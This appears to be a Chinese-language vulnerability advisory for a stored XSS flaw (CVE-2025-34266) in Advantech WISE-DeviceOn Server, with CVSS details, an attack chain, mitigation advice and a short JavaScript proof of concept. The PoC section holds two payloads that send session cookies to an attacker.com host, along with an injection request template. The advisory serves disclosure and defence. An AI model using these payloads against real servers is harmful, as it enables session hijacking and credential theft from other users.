CVE-2025-34266: Advantech WISE-DeviceOn Server 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-34266

漏洞类型

存储型XSS

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Advantech WISE-DeviceOn Server

漏洞概述

CVE-2025-34266是Advantech WISE-DeviceOn Server中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞存在于5.4版本之前的服务器中，具体位于/rmm/v1/plugin-config/addins/menus API端点。当认证用户在AddIns菜单管理功能中添加或编辑菜单项时，程序会将用户输入的label和path字段值直接存储到插件配置数据中。这些存储的数据在后续通过AddIns UI界面展示给其他用户时，未经过充分的HTML转义或清理处理。攻击者可以利用此漏洞向label或path字段注入恶意JavaScript代码，当其他用户访问或操作受影响的AddIns条目时，注入的恶意脚本将在受害者浏览器上下文中执行，可能导致会话劫持、敏感信息窃取或以受害者身份执行未授权操作。由于该漏洞需要低权限认证用户即可实施，且攻击代码会持久化存储在服务器端，因此具有较高的隐蔽性和持续危害性。

技术细节

该漏洞的根本原因在于应用程序缺乏对用户输入的输出编码（Output Encoding）处理。在Advantech WISE-DeviceOn Server的插件配置管理模块中，/rmm/v1/plugin-config/addins/menus端点接收POST请求来创建或更新AddIns菜单项。服务端直接将请求中的label和path参数存储到数据库或配置文件，未进行HTML特殊字符转义。当管理员或其他用户通过Web界面浏览AddIns菜单列表时，这些未经处理的数据被直接渲染到HTML页面中。攻击者只需构造包含<script>标签或事件处理器（如onerror、onload）的payload作为label或path值，即可实现持久化XSS攻击。由于存储型XSS的payload存储在服务器端，每次有用户访问相关页面时都会触发，形成了持续性的攻击向量。CVSS 3.1向量显示该漏洞可通过网络利用（AV:N），需要低权限认证（PR:L）和用户交互（UI:R），对机密性和完整性有低影响（C:L/I:L），可用性无影响（A:N），影响范围为已变更（S:C）。

攻击链分析

STEP 1

步骤1

攻击者获取Advantech WISE-DeviceOn Server的低权限账户（如普通用户或管理员账户）

STEP 2

步骤2

攻击者构造恶意XSS payload（如<script>标签或事件处理器），通过POST请求发送到/rmm/v1/plugin-config/addins/menus端点

STEP 3

步骤3

服务端将攻击者输入的label和path值直接存储到插件配置数据库，未进行HTML转义处理

STEP 4

步骤4

当其他用户（如管理员）访问AddIns菜单管理页面时，存储的恶意脚本被浏览器作为HTML解析执行

STEP 5

步骤5

恶意脚本在受害者浏览器上下文中执行，可窃取会话Cookie、劫持用户会话、执行未授权操作或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-34266 PoC - Stored XSS in Advantech WISE-DeviceOn Server
// Target: /rmm/v1/plugin-config/addins/menus endpoint
// Payload injection via label or path parameter

const payload = '<script>document.location="https://attacker.com/steal?c='+document.cookie+'"</script>';

// Alternative payload using event handler (bypasses some filters)
const altPayload = '<img src=x onerror="fetch(\'https://attacker.com/log?data=\'+btoa(document.cookie))">';

// Step 1: Authenticate and obtain session token
const loginReq = {
  method: 'POST',
  url: '/api/auth/login',
  body: JSON.stringify({
    username: 'low_privilege_user',
    password: 'password'
  })
};

// Step 2: Add malicious AddIns menu entry
const addMenuReq = {
  method: 'POST',
  url: '/rmm/v1/plugin-config/addins/menus',
  headers: {
    'Content-Type': 'application/json',
    'Authorization': 'Bearer <session_token>'
  },
  body: JSON.stringify({
    label: payload,
    path: '/malicious/plugin',
    enabled: true
  })
};

// Step 3: When other users view AddIns UI, XSS executes in their browser context

影响范围

Advantech WISE-DeviceOn Server < 5.4

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制AddIns菜单功能的访问权限，仅允许受信任的管理员使用；2) 实施Web应用防火墙（WAF）规则过滤XSS特征payload；3) 提醒用户不要点击来源不明的AddIns菜单项；4) 定期审计插件配置数据，检测异常内容；5) 监控/rmm/v1/plugin-config/addins/menus端点的访问日志，及时发现异常请求。